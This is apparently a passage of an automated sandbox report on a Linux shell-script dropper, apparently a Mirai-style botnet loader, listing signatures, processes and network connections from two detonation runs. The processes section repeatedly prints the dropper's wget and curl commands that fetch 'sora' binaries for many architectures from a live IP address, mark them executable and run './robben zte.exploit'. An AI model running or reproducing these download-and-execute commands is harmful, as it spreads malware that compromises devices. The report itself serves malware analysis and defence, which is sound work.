| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/cat | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/robben | /tmp/f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh | N/A |
Processes
/tmp/f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh
[/tmp/f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.x86]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.x86]
/bin/cat
[cat sora.x86]
/bin/chmod
[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4f897d62da9643bba7f9ae58129ac207-systemd-timedated.service-3hI9pc]
/tmp/robben
[./robben zte.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.mips]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.mips]
/bin/cat
[cat sora.mips]
/bin/chmod
[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4f897d62da9643bba7f9ae58129ac207-systemd-timedated.service-3hI9pc]
/tmp/robben
[./robben zte.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.x86_64]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.x86_64]
/bin/cat
[cat sora.x86_64]
/bin/chmod
[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4f897d62da9643bba7f9ae58129ac207-systemd-timedated.service-3hI9pc]
/tmp/robben
[./robben zte.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.i468]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.i468]
/bin/cat
[cat sora.i468]
/bin/chmod
[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4f897d62da9643bba7f9ae58129ac207-systemd-timedated.service-3hI9pc]
/tmp/robben
[./robben zte.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.i686]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.i686]
/bin/cat
[cat sora.i686]
/bin/chmod
[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4f897d62da9643bba7f9ae58129ac207-systemd-timedated.service-3hI9pc]
/tmp/robben
[./robben zte.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.mpsl]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.mpsl]
/bin/cat
[cat sora.mpsl]
/bin/chmod
[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4f897d62da9643bba7f9ae58129ac207-systemd-timedated.service-3hI9pc]
/tmp/robben
[./robben zte.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm4]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm4]
/bin/cat
[cat sora.arm4]
/bin/chmod
[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4f897d62da9643bba7f9ae58129ac207-systemd-timedated.service-3hI9pc]
/tmp/robben
[./robben zte.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm5]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm5]
/bin/cat
[cat sora.arm5]
/bin/chmod
[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4f897d62da9643bba7f9ae58129ac207-systemd-timedated.service-3hI9pc]
/tmp/robben
[./robben zte.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm6]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm6]
/bin/cat
[cat sora.arm6]
/bin/chmod
[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4f897d62da9643bba7f9ae58129ac207-systemd-timedated.service-3hI9pc]
/tmp/robben
[./robben zte.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm7]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm7]
/bin/cat
[cat sora.arm7]
/bin/chmod
[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4f897d62da9643bba7f9ae58129ac207-systemd-timedated.service-3hI9pc]
/tmp/robben
[./robben zte.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.ppc]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.ppc]
/bin/cat
[cat sora.ppc]
/bin/chmod
[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4f897d62da9643bba7f9ae58129ac207-systemd-timedated.service-3hI9pc]
/tmp/robben
[./robben zte.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.ppc440fp]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.ppc440fp]
/bin/cat
[cat sora.ppc440fp]
/bin/chmod
[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4f897d62da9643bba7f9ae58129ac207-systemd-timedated.service-3hI9pc]
/tmp/robben
[./robben zte.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.m68k]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.m68k]
/bin/cat
[cat sora.m68k]
/bin/chmod
[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4f897d62da9643bba7f9ae58129ac207-systemd-timedated.service-3hI9pc]
/tmp/robben
[./robben zte.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.sh4]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.sh4]
/bin/cat
[cat sora.sh4]
/bin/chmod
[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4f897d62da9643bba7f9ae58129ac207-systemd-timedated.service-3hI9pc]
/tmp/robben
[./robben zte.exploit]
Network
| Country | Destination | Domain | Proto |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp |
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-10-18 03:05
Reported
2024-10-18 03:08
Platform
debian9-mipsel-20240611-en
Max time kernel
29s
Max time network
30s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/cat | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/robben | /tmp/f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh | N/A |
Processes
/tmp/f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh
[/tmp/f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.x86]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.x86]
/bin/cat
[cat sora.x86]
/bin/chmod
[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4d4d908f319d4916bf9ee2a60ae2767c-systemd-timedated.service-AH9oIr]
/tmp/robben
[./robben zte.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.mips]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.mips]
/bin/cat
[cat sora.mips]
/bin/chmod
[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4d4d908f319d4916bf9ee2a60ae2767c-systemd-timedated.service-AH9oIr]
/tmp/robben
[./robben zte.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.x86_64]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.x86_64]
/bin/cat
[cat sora.x86_64]
/bin/chmod
[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4d4d908f319d4916bf9ee2a60ae2767c-systemd-timedated.service-AH9oIr]
/tmp/robben
[./robben zte.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.i468]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.i468]
/bin/cat
[cat sora.i468]
/bin/chmod
[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4d4d908f319d4916bf9ee2a60ae2767c-systemd-timedated.service-AH9oIr]
/tmp/robben
[./robben zte.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.i686]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.i686]
/bin/cat
[cat sora.i686]
/bin/chmod
[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4d4d908f319d4916bf9ee2a60ae2767c-systemd-timedated.service-AH9oIr]
/tmp/robben
[./robben zte.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.mpsl]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.mpsl]
/bin/cat
[cat sora.mpsl]
/bin/chmod
[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4d4d908f319d4916bf9ee2a60ae2767c-systemd-timedated.service-AH9oIr]
/tmp/robben
[./robben zte.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm4]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm4]
/bin/cat
[cat sora.arm4]
/bin/chmod
[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4d4d908f319d4916bf9ee2a60ae2767c-systemd-timedated.service-AH9oIr]
/tmp/robben
[./robben zte.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm5]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm5]
/bin/cat
[cat sora.arm5]
/bin/chmod
[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4d4d908f319d4916bf9ee2a60ae2767c-systemd-timedated.service-AH9oIr]
/tmp/robben
[./robben zte.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm6]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm6]
/bin/cat
[cat sora.arm6]
/bin/chmod
[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4d4d908f319d4916bf9ee2a60ae2767c-systemd-timedated.service-AH9oIr]
/tmp/robben
[./robben zte.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm7]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm7]
/bin/cat
[cat sora.arm7]
/bin/chmod
[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4d4d908f319d4916bf9ee2a60ae2767c-systemd-timedated.service-AH9oIr]
/tmp/robben
[./robben zte.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.ppc]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.ppc]
/bin/cat
[cat sora.ppc]
/bin/chmod
[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4d4d908f319d4916bf9ee2a60ae2767c-systemd-timedated.service-AH9oIr]
/tmp/robben
[./robben zte.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.ppc440fp]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.ppc440fp]
/bin/cat
[cat sora.ppc440fp]
/bin/chmod
[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4d4d908f319d4916bf9ee2a60ae2767c-systemd-timedated.service-AH9oIr]
/tmp/robben
[./robben zte.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.m68k]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.m68k]
/bin/cat
[cat sora.m68k]
/bin/chmod
[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4d4d908f319d4916bf9ee2a60ae2767c-systemd-timedated.service-AH9oIr]
/tmp/robben
[./robben zte.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.sh4]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.sh4]
/bin/cat
[cat sora.sh4]
/bin/chmod
[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4d4d908f319d4916bf9ee2a60ae2767c-systemd-timedated.service-AH9oIr]
/tmp/robben
[./robben zte.exploit]
Network
| Country | Destination | Domain | Proto |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp |